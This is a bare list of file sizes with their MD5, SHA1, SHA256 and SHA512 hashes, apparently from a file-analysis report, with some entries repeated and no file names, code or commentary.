MD53de8733baaf72b71b2dc206361d57d49
SHA1e56011ae28e2bc957f1b96537b478f221f68b06d
SHA2568be2829f835bc11d2c6e9953cfaa7c4c216e307a34a3c7e64bb8a785748e18f6
SHA512355d9b748a7720aa8ca5b73d116af9849f395786ca71af2d44d183da1df51022ad02aaa49f1f2cdd5cc2bff664fcc8d33a3258ad91afd8f4d6ef2b56f5827196
-
Filesize
2KB
MD53e9af076957c5b2f9c9ce5ec994bea05
SHA1a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f
-
Filesize
8.4MB
MD5768200a76def472e675539094047bed9
SHA124bc17689541656a8a12902c7f19bd991193ca50
SHA25679ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb
-
Filesize
1.7MB
MD5f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA16ed43db5ba58257c1283abfa8a08290ccf896033
SHA25667cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA5126e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5
-
Filesize
1.7MB
MD5f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA16ed43db5ba58257c1283abfa8a08290ccf896033
SHA25667cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA5126e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5
-
Filesize
1.7MB
MD5f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA16ed43db5ba58257c1283abfa8a08290ccf896033
SHA25667cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA5126e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5
-
Filesize
1.7MB
MD5f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA16ed43db5ba58257c1283abfa8a08290ccf896033
SHA25667cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA5126e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5
-
Filesize
1.7MB
MD5f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA16ed43db5ba58257c1283abfa8a08290ccf896033
SHA25667cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA5126e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5
-
Filesize
8.4MB
MD5768200a76def472e675539094047bed9
SHA124bc17689541656a8a12902c7f19bd991193ca50
SHA25679ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb
-
Filesize
4.0MB
MD53258deefff3ca70f3dfa3e67067ca611
SHA1a28ec103c22b03f381dd72073cf620b11881b7b7
SHA25611c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8
-
Filesize
6.5MB
MD589e9bc7a5d97370a0f4a35041a54a696
SHA1c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA2569b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA51212100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2
-
Filesize
637.3MB
MD5c3944a1e56f3c41bd7957fe045472ce8
SHA1ad17123ad2b3f4d9a516c93b88d42930c047bb85
SHA256e27f51358d373b0b6cdf3e32f38bf3c836113fdbde4756ea26d0a4d1f4e101fb
SHA512323bb4670d7dc3ef3b354cc724f9538dd683f221310ee96c78f01fc4680bade3c7628711af5ba0ff03c1584fc7cb5363f10faef9c8578e0bb632dc8d1657d057